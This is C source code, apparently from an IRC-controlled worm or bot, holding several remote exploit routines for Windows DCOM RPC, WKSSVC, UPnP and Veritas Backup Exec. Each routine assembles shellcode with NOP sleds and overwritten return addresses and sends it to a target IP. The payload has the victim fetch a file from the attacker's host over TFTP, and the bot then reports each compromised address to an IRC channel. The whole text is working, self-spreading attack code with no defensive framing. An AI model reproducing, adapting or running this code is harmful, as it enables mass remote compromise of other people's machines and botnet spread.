char *CreateDCOMRequestPacket(EXINFO exinfo, DWORD *RequestPacketSize, int TargetOS, BOOL NamedPipe)
{
char *pTemp, szSCBuf[4096], szReqBuf[4096], szShellBuf[4096];
int iShellSize = 0, iPos = 0, iSCSize = 0, iReqSize = 0, iNOPSize = sizeof(nops)-1;
// get shellcode
iShellSize = GetRNS0TerminatedShellcode(szShellBuf, 4096, GetIP(exinfo.sock), filename);
if (!iShellSize)
return 0;
// build a buffer with the shellcode
memcpy(szSCBuf+iPos, shellcode_start, sizeof(shellcode_start)-1); iPos += sizeof(shellcode_start)-1;
memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos += iNOPSize;
memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos += iShellSize;
iSCSize = iPos; iPos = 0;
// prepend NOPs as long as shellcode doesn't fit RPC packet format
while ((iSCSize % 16) != 12) {
iNOPSize++;
memcpy(szSCBuf+iPos, shellcode_start, sizeof(shellcode_start)-1); iPos += sizeof(shellcode_start)-1;
memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos += iNOPSize;
memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos += iShellSize;
iSCSize = iPos; iPos = 0;
}
// set the return address
if (NamedPipe) {
if (TargetOS == OS_WINXP || TargetOS == OS_UNKNOWN)
memcpy(szSCBuf+36, (char *)&call_ebx_offsets[1], 4);
else
memcpy(szSCBuf+36, (char *)&call_ebx_offsets[0], 4);
} else {
if (TargetOS == OS_WINXP)
memcpy(szSCBuf+36, (char*)&call_ebx_offsets[1], 4);
else
memcpy(szSCBuf+36, (char*)&call_ebx_offsets[0], 4);
}
// build the request
memcpy(szReqBuf+iPos, request1, sizeof(request1)-1); iPos += sizeof(request1)-1;
memcpy(szReqBuf+iPos, request2, sizeof(request2)-1); iPos += sizeof(request2)-1;
memcpy(szReqBuf+iPos, szSCBuf, iSCSize ); iPos += iSCSize;
memcpy(szReqBuf+iPos, request3, sizeof(request3)-1); iPos += sizeof(request3)-1;
memcpy(szReqBuf+iPos, request4, sizeof(request4)-1); iPos += sizeof(request4)-1;
iReqSize = iPos;
// fill the request with the right sizes
pTemp = szReqBuf + (sizeof(request1)-1);
*(unsigned long*)(pTemp) = *(unsigned long*)(pTemp) + iSCSize / 2;
*(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iSCSize / 2; pTemp = szReqBuf;
*(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iSCSize - 12;
*(unsigned long*)(pTemp+16) = *(unsigned long*)(pTemp+16) + iSCSize - 12;
*(unsigned long*)(pTemp+128) = *(unsigned long*)(pTemp+128) + iSCSize - 12;
*(unsigned long*)(pTemp+132) = *(unsigned long*)(pTemp+132) + iSCSize - 12;
*(unsigned long*)(pTemp+180) = *(unsigned long*)(pTemp+180) + iSCSize - 12;
*(unsigned long*)(pTemp+184) = *(unsigned long*)(pTemp+184) + iSCSize - 12;
*(unsigned long*)(pTemp+208) = *(unsigned long*)(pTemp+208) + iSCSize - 12;
*(unsigned long*)(pTemp+396) = *(unsigned long*)(pTemp+396) + iSCSize - 12;
char *Shellcode = (char *)malloc(iReqSize+1);
memset(Shellcode, 0, iReqSize+1);
memcpy(Shellcode, szReqBuf, iReqSize);
*RequestPacketSize = iReqSize;
return Shellcode;
}
BOOL VertiasBackupExec( EXINFO exinfo, VertiasBackupExec_Version eVersion )
{
char *pszVerString;
// ---
int nShellSize;
char szShellBuf[ 512 ];
// ---
SOCKET nFDSocket;
sockaddr_in ServerAddr;
// ---
int nCounter;
// prepare version depending data
if( eVersion == Backup_Exec_v9_1_4691_SP1_SP0 )
{
memcpy( &talk[ 37 ], &v91sp0sp1, 4 );
memcpy( &talk[ 72 ], &esisp0sp1, 4 );
pszVerString = "v9.1.4691.0+1";
}
else if( eVersion == Backup_Exec_v8_5_3572 )
{
memcpy( &talk[ 37 ], &v85, 4 );
memcpy( &talk[ 72 ], &esiold, 4 );
pszVerString = "v8.5.3572";
}
else
return FALSE;
// get shellcode
nShellSize = GetRNS0TerminatedShellcode( szShellBuf, sizeof( szShellBuf ), GetIP( exinfo.sock ), filename );
if( !nShellSize )
return FALSE;
// create socket
nFDSocket = fsocket( AF_INET, SOCK_STREAM, IPPROTO_IP );
if( nFDSocket == INVALID_SOCKET )
return FALSE;
// connect to it
memset( &ServerAddr, 0, sizeof( ServerAddr ) );
ServerAddr.sin_family = AF_INET;
ServerAddr.sin_port = fhtons( exinfo.port );
ServerAddr.sin_addr.s_addr = finet_addr( exinfo.ip );
if( fconnect( nFDSocket, (sockaddr*)&ServerAddr, sizeof( ServerAddr ) ) == SOCKET_ERROR )
{
fclosesocket( nFDSocket );
return FALSE;
}
// send talk
if( fsend( nFDSocket, talk, sizeof( talk ) - 1, 0 ) == SOCKET_ERROR )
{
fclosesocket( nFDSocket );
return FALSE;
}
Sleep( 10 );
// send payload(s)
for( nCounter = 0; nCounter < 7; nCounter++ )
{
if( fsend( nFDSocket, szShellBuf, strlen( szShellBuf ), 0 ) == SOCKET_ERROR )
{
fclosesocket( nFDSocket );
return FALSE;
}
Sleep( 10 );
}
Sleep( 1000 );
fclosesocket( nFDSocket );
// MESSAGE(S)
char buffer[ IRCLINE ];
_snprintf(buffer, sizeof(buffer), "[%s (%s)]: Exploiting IP: %s.", exploit[exinfo.exploit].name, pszVerString, exinfo.ip);
if (!exinfo.silent)
irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
return TRUE;
}
BOOL dcom2(EXINFO exinfo)
{
char sendbuf[IRCLINE],*pTemp;
char szRecvBuf[4096],szLoadBuf[4096],szReqBuf[4096],szShellBuf[4096],szLoaderBuf[4096];
int iShellSize=0,iLoaderSize=0,iPos=0,iSCSize=0,iLoadSize=0,iReqSize=0;
int TargetOS = FpHost(exinfo.ip, FP_RPC);
if (TargetOS == OS_UNKNOWN || TargetOS == OS_WINNT) return FALSE;
// get a funky fresh socket
SOCKET sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP);
if (sSocket == SOCKET_ERROR) return FALSE;
// fill in sockaddr and resolve the host
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)exinfo.port);
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
iShellSize = GetRNS0TerminatedShellcode(szShellBuf, 4096, GetIP(exinfo.sock), filename);
if (!iShellSize) return 0;
iLoaderSize = EncodeRNS0(szLoaderBuf, 4096, dcom2_loader, sizeof(dcom2_loader)-1);
memcpy(szLoadBuf+iPos, dcom2_shellcode_buf, sizeof(dcom2_shellcode_buf) ); iPos+=sizeof(dcom2_shellcode_buf);
memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC, szLoaderBuf, iLoaderSize );
memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC, szShellBuf, iShellSize );
memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_JMP_ADDR, &dcom2_my_offsets[0].lJmpAddr, 4 );
memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_TOP_SEH, &dcom2_my_offsets[0].lTopSEH, 4 );
iLoadSize = iPos; iPos = 0;
pTemp = szReqBuf+sizeof(dcom2_request1)-1; // Fill the request with the right sizes
*(unsigned long*)(pTemp) = *(unsigned long*)(pTemp) + iLoadSize / 2;
*(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iLoadSize / 2; pTemp=szReqBuf;
*(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iLoadSize - 12;
*(unsigned long*)(pTemp+16) = *(unsigned long*)(pTemp+16) + iLoadSize - 12;
*(unsigned long*)(pTemp+128) = *(unsigned long*)(pTemp+128) + iLoadSize - 12;
*(unsigned long*)(pTemp+132) = *(unsigned long*)(pTemp+132) + iLoadSize - 12;
*(unsigned long*)(pTemp+180) = *(unsigned long*)(pTemp+180) + iLoadSize - 12;
*(unsigned long*)(pTemp+184) = *(unsigned long*)(pTemp+184) + iLoadSize - 12;
*(unsigned long*)(pTemp+208) = *(unsigned long*)(pTemp+208) + iLoadSize - 12;
*(unsigned long*)(pTemp+396) = *(unsigned long*)(pTemp+396) + iLoadSize - 12;
// connect with target IP
int iErr = fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin));
if (iErr==-1) { // connect failed, exit
fclosesocket(sSocket);
return FALSE;
}
// send the bind string
if (fsend(sSocket, dcom2_bindstr, sizeof(dcom2_bindstr)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
// read reply
frecv(sSocket, szRecvBuf, 4096, 0);
// Check for DCE_PKT_BINDACK
if (szRecvBuf[2] != DCE_PKT_BINDACK) {
fclosesocket(sSocket);
return FALSE;
}
// send evil request
if (fsend(sSocket, szReqBuf, iReqSize, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
// read reply
frecv(sSocket, szRecvBuf, 4096, 0);
if (szRecvBuf[2] == DCE_PKT_FAULT) {
fclosesocket(sSocket);
return FALSE;
}
fclosesocket(sSocket);
sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s", exinfo.ip);
for (int i=0; i < 6; i++) {
if (searchlog(sendbuf)) {
sprintf(sendbuf, "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
addlog(sendbuf);
exploit[exinfo.exploit].stats++;
break;
}
Sleep(5000);
}
return TRUE;
}
BOOL ScriptGod_WKSSVC( unsigned long nTargetID, EXINFO exinfo )
{
int TargetOS;
char szShellBuf[ 512 ];
int iShellSize;
// =============================
char* pszTarget;
// ---
char szNetbiosTarget[ 8192 ];
wchar_t wszNetbiosTarget[ 8192 ];
unsigned char szShellcodeEncoded[ ( sizeof( szShellBuf ) * 2 ) + 1 ];
unsigned char szExploitsData[ 3500 ];
unsigned long nExploitsDataPos;
wchar_t wszExploitsData[ sizeof( szExploitsData ) ];
// ---
char szIPC[ 8192 ];
NETRESOURCE NetSource;
// ---
char szPipe[ 8192 ];
HANDLE hPipe;
// ---
RPC_ReqBind BindPacket;
unsigned long nBytesWritten;
RPC_ReqNorm ReqNormalHeader;
unsigned long nPacketSize;
unsigned char* pPacket;
unsigned long nPacketPos;
// ============================
// check if xp
TargetOS = FpHost( exinfo.ip, FP_RPC );
if( TargetOS != OS_WINXP )
return FALSE;
// parameters
pszTarget = exinfo.ip;
// get shellcode
iShellSize = GetRNS0TerminatedShellcode( szShellBuf, sizeof( szShellBuf ), GetIP( exinfo.sock ), filename );
if( !iShellSize )
return FALSE;
// generate exploits buffer
// ========================
memset( szShellcodeEncoded, 0, sizeof( szShellcodeEncoded ) );
memset( szExploitsData, 0, sizeof( szExploitsData ) );
memset( wszExploitsData, 0, sizeof( wszExploitsData ) );
// fill with NOPs (using inc ecx instead of NOP, 0-terminated-string)
memset( szExploitsData, 'A', sizeof( szExploitsData ) - 1 );
// new EIP
*(unsigned long*)( &szExploitsData[ Targets[ nTargetID ].nNewEIP_BufferOffset ] ) = Targets[ nTargetID ].nNewEIP;
// some NOPs
nExploitsDataPos = 2300;
// add stack
memcpy( &szExploitsData[ nExploitsDataPos ], szStack, sizeof( szStack ) - 1 );
nExploitsDataPos += sizeof( szStack ) - 1;
// add decoder
memcpy( &szExploitsData[ nExploitsDataPos ], szDecoder, sizeof( szDecoder ) - 1 );
nExploitsDataPos += sizeof( szDecoder ) - 1;
// add shellcode
// - bind port
// - encode
Encode( (unsigned char*)szShellBuf, iShellSize, szShellcodeEncoded );
// - add
memcpy( &szExploitsData[ nExploitsDataPos ], szShellcodeEncoded, strlen( (char*)szShellcodeEncoded ) );
nExploitsDataPos += strlen( (char*)szShellcodeEncoded );
// - 0 terminaten for decoder
szExploitsData[ nExploitsDataPos ] = 0;
nExploitsDataPos += 1;
// convert to UNICODE
// ==================
for( int n = 0; n < sizeof( szExploitsData ); n++ )
wszExploitsData[ n ] = szExploitsData[ n ];
//MultiByteToWideChar( CP_ACP, 0, (char*)szExploitsData, -1, wszExploitsData, sizeof( wszExploitsData ) / sizeof( wchar_t ) );
snprintf( szNetbiosTarget, sizeof( szNetbiosTarget ), "\\\\%s", pszTarget );
mbstowcs( wszNetbiosTarget, szNetbiosTarget, sizeof( wszNetbiosTarget ) / sizeof( wchar_t ) );
// create NULL session
// ===================
if( strcmpi( pszTarget, "." ) )
{
snprintf( szIPC, sizeof( szIPC ), "\\\\%s\\ipc$", pszTarget );
memset( &NetSource, 0 ,sizeof( NetSource ) );
NetSource.lpRemoteName = szIPC;
fWNetAddConnection2( &NetSource, "", "", 0 );
}
// ===================
// connect to pipe
// ===============
snprintf( szPipe, sizeof( szPipe ), "\\\\%s\\pipe\\wkssvc", pszTarget );
hPipe = CreateFile( szPipe, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL );
if( hPipe == INVALID_HANDLE_VALUE )
{
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
return FALSE;
}
// ===============
// bind packet
// ===========
memset( &BindPacket, 0, sizeof( BindPacket ) );
BindPacket.NormalHeader.versionmaj = 5;
BindPacket.NormalHeader.versionmin = 0;
BindPacket.NormalHeader.type = 11; // bind
BindPacket.NormalHeader.flags = 3; // first + last fragment
BindPacket.NormalHeader.representation = 0x00000010; // little endian
BindPacket.NormalHeader.fraglength = sizeof( BindPacket );
BindPacket.NormalHeader.authlength = 0;
BindPacket.NormalHeader.callid = 1;
BindPacket.maxtsize = 4280;
BindPacket.maxrsize = 4280;
BindPacket.assocgid = 0;
BindPacket.numelements = 1;
BindPacket.contextid = 0;
BindPacket.numsyntaxes = 1;
BindPacket.Interface1.version = 1;
memcpy( BindPacket.Interface1.byte, "\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3\xf8\x7e\x34\x5a", 16 );
BindPacket.Interface2.version = 2;
memcpy( BindPacket.Interface2.byte, "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60", 16 );
// send
if( !WriteFile( hPipe, &BindPacket, sizeof( RPC_ReqBind ), &nBytesWritten, NULL ) )
{
CloseHandle( hPipe );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
return FALSE;
}
// ===========
// request
// =======
// generate packet
// ---------------
// calc packet size
nPacketSize = 0;
nPacketSize += sizeof( szWKSSVCUnknown1 ) - 1;
nPacketSize += sizeof( UNISTR2 );
nPacketSize += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t );
while( nPacketSize % 4 )
nPacketSize++;
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
nPacketSize += sizeof( szWKSSVCUnknown2 ) - 1;
nPacketSize += sizeof( UNISTR2 );
nPacketSize += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t );
while( nPacketSize % 4 )
nPacketSize++;
nPacketSize += 8; // szWSSKVCUnknown3
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
nPacketSize += 4; // NetAddAlternateComputerName = reserved
else
nPacketSize += 2; // NetValidateName = NameType
// alloc packet
pPacket = (unsigned char*)malloc( nPacketSize );
if( !pPacket )
{
CloseHandle( hPipe );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
return FALSE;
}
memset( pPacket, 0, nPacketSize );
// build packet
nPacketPos = 0;
// - szWKSSVCUnknown1
memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown1, sizeof( szWKSSVCUnknown1 ) - 1 );
nPacketPos += sizeof( szWKSSVCUnknown1 ) - 1;
// - wszNetbiosTarget
( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszNetbiosTarget ) + 1;
( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0;
( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length;
nPacketPos += sizeof( UNISTR2 );
wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszNetbiosTarget );
nPacketPos += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t );
// - align
while( nPacketPos % 4 )
nPacketPos++;
// - szWKSSVCUnknown2
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
{
memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown2, sizeof( szWKSSVCUnknown2 ) - 1 );
nPacketPos += sizeof( szWKSSVCUnknown2 ) - 1;
}
// - wszExploitsData
( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszExploitsData ) + 1;
( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0;
( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length;
nPacketPos += sizeof( UNISTR2 );
wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszExploitsData );
nPacketPos += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t );
// - align
while( nPacketPos % 4 )
nPacketPos++;
// - szWSSKVCUnknown3 (only eigth 0x00s)
memset( &pPacket[ nPacketPos ], 0, 8 );
nPacketPos += 8;
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
{
// NetAddAlternateComputerName = 0
*(DWORD*)&pPacket[ nPacketPos ] = 0;
nPacketPos += sizeof( DWORD );
}
else
{
// NetValidateName = NetSetupMachine
*(unsigned short*)&pPacket[ nPacketPos ] = 1;
nPacketPos += 2;
}
// header
memset( &ReqNormalHeader, 0, sizeof( ReqNormalHeader ) );
ReqNormalHeader.NormalHeader.versionmaj = 5;
ReqNormalHeader.NormalHeader.versionmin = 0;
ReqNormalHeader.NormalHeader.type = 0; // request
ReqNormalHeader.NormalHeader.flags = 3; // first + last fragment
ReqNormalHeader.NormalHeader.representation = 0x00000010; // little endian
ReqNormalHeader.NormalHeader.authlength = 0;
ReqNormalHeader.NormalHeader.callid = 1;
ReqNormalHeader.prescontext = 0;
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
ReqNormalHeader.opnum = 27; // NetrAddAlternateComputerName
else
ReqNormalHeader.opnum = 25; // NetrValidateName2
// send
if( !SendReqPacket_Part( hPipe, ReqNormalHeader, pPacket, nPacketSize, 4280, true ) )
{
CloseHandle( hPipe );
free( pPacket );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
return FALSE;
}
// =======
// clean up
// =================;
CloseHandle( hPipe );
free( pPacket );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
char buffer[ IRCLINE ];
//_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
return TRUE;
}
BOOL upnp(EXINFO exinfo)
{
char sendbuf[IRCLINE],szRequest[2048],szJmpCode[281],szExeCode[840];
int i;
for(i = 0; i < 268; i++)
szJmpCode[i] = (char)0x43;
szJmpCode[268]=(char)0x4D; szJmpCode[269]=(char)0x3F;
szJmpCode[270]=(char)0xE3; szJmpCode[271]=(char)0x77;
szJmpCode[272]=(char)0x90; szJmpCode[273]=(char)0x90;
szJmpCode[274]=(char)0x90; szJmpCode[275]=(char)0x90;
//jmp [ebx+0x64], jump to execute shellcode
szJmpCode[276]=(char)0xFF; szJmpCode[277]=(char)0x63;
szJmpCode[278]=(char)0x64; szJmpCode[279]=(char)0x90;
szJmpCode[280]=(char)0x00;
for(i = 0; i < 32; i++)
szExeCode[i] = (char)0x43;
szExeCode[32] = (char)0x00;
char *sc = (char *)malloc(4096);
DWORD scsize = GetRNS0TerminatedShellcode(sc, 4096, GetIP(exinfo.sock), filename);
if (!scsize) {
free(sc);
return FALSE;
}
strcat(szExeCode, sc);
sprintf(szRequest, "%s%s\r\n\r\n", szJmpCode, szExeCode);
SOCKET sSock = fsocket(AF_INET, SOCK_STREAM, 0);
if (sSock == SOCKET_ERROR) {
free(sc);
return FALSE;
}
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons(exinfo.port);
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
memset(ssin.sin_zero, 0, 8);
if (fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(SOCKADDR_IN)) == SOCKET_ERROR) { // Connect failed, exit
free(sc);
fclosesocket(sSock);
return FALSE;
}
if (fsend(sSock, szRequest, strlen(szRequest)+1,0) == SOCKET_ERROR) {
free(sc);
fclosesocket(sSock);
return FALSE;
}
free(sc);
fclosesocket(sSock);
Sleep(1000);
sprintf(sendbuf,"[TFTPD]: File transfer started to IP: %s", exinfo.ip);
if (searchlog(sendbuf, TRUE)) {
sprintf(sendbuf, "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
addlog(sendbuf);
exploit[exinfo.exploit].stats++;
}
return TRUE;
}
